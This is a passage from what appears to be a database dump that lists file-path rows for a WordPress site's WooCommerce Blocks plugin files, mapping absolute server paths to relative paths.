mmmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-shipping-method-pickup-location.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-shipping-method-pickup-location.js'),(10309,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/checkstyle.xml','wp-content/plugins/woocommerce/packages/woocommerce-blocks/checkstyle.xml'),(10310,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/global.d.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/global.d.ts'),(10311,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/block-error.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/block-error.svg'),(10312,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/block-placeholders/product-image-gallery.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/block-placeholders/product-image-gallery.svg'),(10313,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/block-placeholders/product-reviews.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/block-placeholders/product-reviews.svg'),(10314,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/blocks/mini-cart/cart-drawer-rtl.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/blocks/mini-cart/cart-drawer-rtl.svg'),(10315,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/blocks/mini-cart/cart-drawer.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/blocks/mini-cart/cart-drawer.svg'),(10316,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/beach-landscape-sea-coast-nature-person.jpg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/beach-landscape-sea-coast-nature-person.jpg'),(10317,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/crafting-pots.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/crafting-pots.png'),(10318,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/desk-table-wood-chair-floor-home-square.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/desk-table-wood-chair-floor-home-square.png'),(10319,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/dining-room.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/dining-room.png'),(10320,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/dish-food-baking-dessert-bread-bakery.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/dish-food-baking-dessert-bread-bakery.png'),(10321,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/dish-meal-food-breakfast-dessert-eat.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/dish-meal-food-breakfast-dessert-eat.png'),(10322,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/floor-home-decoration-fireplace-property-living-room.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/floor-home-decoration-fireplace-property-living-room.png'),(10323,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/fresh-lettuce-washed.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/fresh-lettuce-washed.png'),(10324,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/fresh-organic-tomatoes.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/fresh-organic-tomatoes.png'),(10325,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/hand-guitar-finger-tshirt-clothing-rack.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/hand-guitar-finger-tshirt-clothing-rack.png'),(10326,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/hand-made-pots.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/hand-made-pots.png'),(10327,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/leather-guitar-typewriter-red-gadget-sofa.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/leather-guitar-typewriter-red-gadget-sofa.png'),(10328,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/living-room-sofa.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/living-room-sofa.png'),(10329,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/living-room.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/living-room.png'),(10330,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/man-person-winter-photography-statue-coat.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/man-person-winter-photography-statue-coat.png'),(10331,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/music-technology-play-equipment-studio-gadget.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/music-technology-play-equipment-studio-gadget.png'),(10332,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/office.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/office.png'),(10333,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/pattern-fashion-clothing-outerwear-wool-scarf.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/pattern-fashion-clothing-outerwear-wool-scarf.png'),(10334,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/person-winter-blur-wood-girl-woman.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/person-winter-blur-wood-girl-woman.png'),(10335,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/russet-organic-potatoes.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/russet-organic-potatoes.png'),(10336,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/sweet-organic-lemons.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/sweet-organic-lemons.png'),(10337,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/sweet-restaurant-celebration-food-chocolate-cupcake.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/sweet-restaurant-celebration-food-chocolate-cupcake.png'),(10338,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/table-floor-home-living-room-furniture-room-square.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/table-floor-home-living-room-furniture-room-square.png'),(10339,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/table-floor-home-living-room-furniture-room.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/table-floor-home-living-room-furniture-room.png'),(10340,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/table-floor-interior-atmosphere-living-room-furniture-square-lg.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/table-floor-interior-atmosphere-living-room-furniture-square-lg.png'),(10341,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/table-floor-interior-atmosphere-living-room-furniture-square.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/table-floor-interior-atmosphere-living-room-furniture-square.png'),(10342,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/table-white-chair-floor-shelf-lamp-square-lg.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/table-white-chair-floor-shelf-lamp-square-lg.png'),(10343,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/table-wood-chair-floor-living-room-furniture-horizontal.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/table-wood-chair-floor-living-room-furniture-horizontal.png'),(10344,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/table-wood-chair-floor-living-room-furniture-vertical.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/table-wood-chair-floor-living-room-furniture-vertical.png'),(10345,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/technology-joystick-gadget-console-games-playstation.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/technology-joystick-gadget-console-games-playstation.png'),(10346,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/technology-white-camera-photography-vintage-photographer.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/technology-white-camera-photography-vintage-photographer.png'),(10347,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/wood-home-wall-decoration-shelf-living-room.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/wood-home-wall-decoration-shelf-living-room.png'),(10348,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/alipay.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/alipay.svg'),(10349,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/amex.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/amex.svg'),(10350,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/bancontact.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/bancontact.svg'),(10351,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/diners.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/diners.svg'),(10352,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/discover.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/discover.svg'),(10353,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/eps.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/eps.svg'),(10354,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/giropay.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/giropay.svg'),(10355,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/ideal.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/ideal.svg'),(10356,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/jcb.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/jcb.svg'),(10357,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/laser.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/laser.svg'),(10358,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/maestro.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/maestro.svg'),(10359,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/mastercard.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/mastercard.svg'),(10360,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/multibanco.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/multibanco.svg'),(10361,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/p24.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/p24.svg'),(10362,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/sepa.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/sepa.svg'),(10363,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/sofort.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/sofort.svg'),(10364,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/unionpay.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/unionpay.svg'),(10365,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/visa.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/visa.svg'),(10366,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/wechat.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/payment-methods/wechat.svg'),(10367,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/beanie.jpg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/beanie.jpg'),(10368,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/cap.jpg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/cap.jpg'),(10369,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/collection.jpg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/collection.jpg'),(10370,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/hoodie-with-logo.jpg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/hoodie-with-logo.jpg'),(10371,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/hoodie-with-pocket.jpg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/hoodie-with-pocket.jpg'),(10372,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/hoodie-with-zipper.jpg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/hoodie-with-zipper.jpg'),(10373,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/long-sleeve-tee.jpg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/long-sleeve-tee.jpg'),(10374,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/pennant.jpg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/pennant.jpg'),(10375,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/polo.jpg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/polo.jpg'),(10376,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/tshirt.jpg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/previews/tshirt.jpg'),(10377,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/template-placeholders/archive-product.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/template-placeholders/archive-product.svg'),(10378,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/template-placeholders/fallback.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/template-placeholders/fallback.svg'),(10379,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/template-placeholders/single-product.svg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/template-placeholders/single-product.svg'),(10380,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/get-registered-blocks.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/get-registered-blocks.ts'),(10381,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/index.ts'),(10382,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/inserter.png','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/inserter.png'),(10383,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/register-checkout-block.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/register-checkout-block.ts'),(10384,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/registered-blocks.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/registered-blocks.ts'),(10385,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/test/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/test/index.js'),(10386,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/types.ts'),(10387,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/blocks-registry/utils.ts'),(10388,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/button/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/button/index.ts'),(10389,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/checkbox-control/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/checkbox-control/index.tsx'),(10390,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/checkbox-control/stories/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/checkbox-control/stories/index.tsx'),(10391,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/checkbox-control/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/checkbox-control/style.scss'),(10392,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/discounts-meta/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/discounts-meta/index.js'),(10393,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/error-boundary/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/error-boundary/index.js'),(10394,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/index.ts'),(10395,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/label/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/label/index.ts'),(10396,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/order-local-pickup-packages/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/order-local-pickup-packages/index.tsx'),(10397,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/order-meta/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/order-meta/index.js'),(10398,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/order-shipping-packages/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/order-shipping-packages/index.js'),(10399,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/panel/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/panel/index.tsx'),(10400,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/panel/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/panel/style.scss'),(10401,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/store-notice/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/store-notice/index.tsx'),(10402,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/store-notices-container/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/store-notices-container/index.tsx'),(10403,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/store-notices-container/snackbar-notices.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/store-notices-container/snackbar-notices.tsx'),(10404,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/store-notices-container/store-notices.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/store-notices-container/store-notices.tsx'),(10405,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/store-notices-container/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/store-notices-container/style.scss'),(10406,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/store-notices-container/test/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/store-notices-container/test/index.tsx'),(10407,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/store-notices-container/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/store-notices-container/types.ts'),(10408,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/text-input/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/text-input/style.scss'),(10409,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/text-input/test/validated-text-input.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/text-input/test/validated-text-input.tsx'),(10410,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/text-input/text-input.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/text-input/text-input.tsx'),(10411,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/text-input/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/text-input/types.ts'),(10412,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/text-input/validated-text-input.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/text-input/validated-text-input.tsx'),(10413,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/fees/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/fees/index.tsx'),(10414,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/fees/stories/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/fees/stories/index.tsx'),(10415,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/index.js'),(10416,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/item/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/item/index.tsx'),(10417,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/item/stories/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/item/stories/index.tsx'),(10418,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/item/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/item/style.scss'),(10419,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/subtotal/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/subtotal/index.tsx'),(10420,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/subtotal/stories/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/subtotal/stories/index.tsx'),(10421,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/taxes/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/taxes/index.tsx'),(10422,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/taxes/stories/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals/taxes/stories/index.tsx'),(10423,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals-wrapper/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals-wrapper/index.tsx'),(10424,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals-wrapper/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/totals-wrapper/style.scss'),(10425,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/validation-input-error/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/validation-input-error/index.tsx'),(10426,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/validation-input-error/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/components/validation-input-error/style.scss'),(10427,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/filter-registry/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/filter-registry/index.ts'),(10428,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/filter-registry/test/admin.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/packages/checkout/filter-registr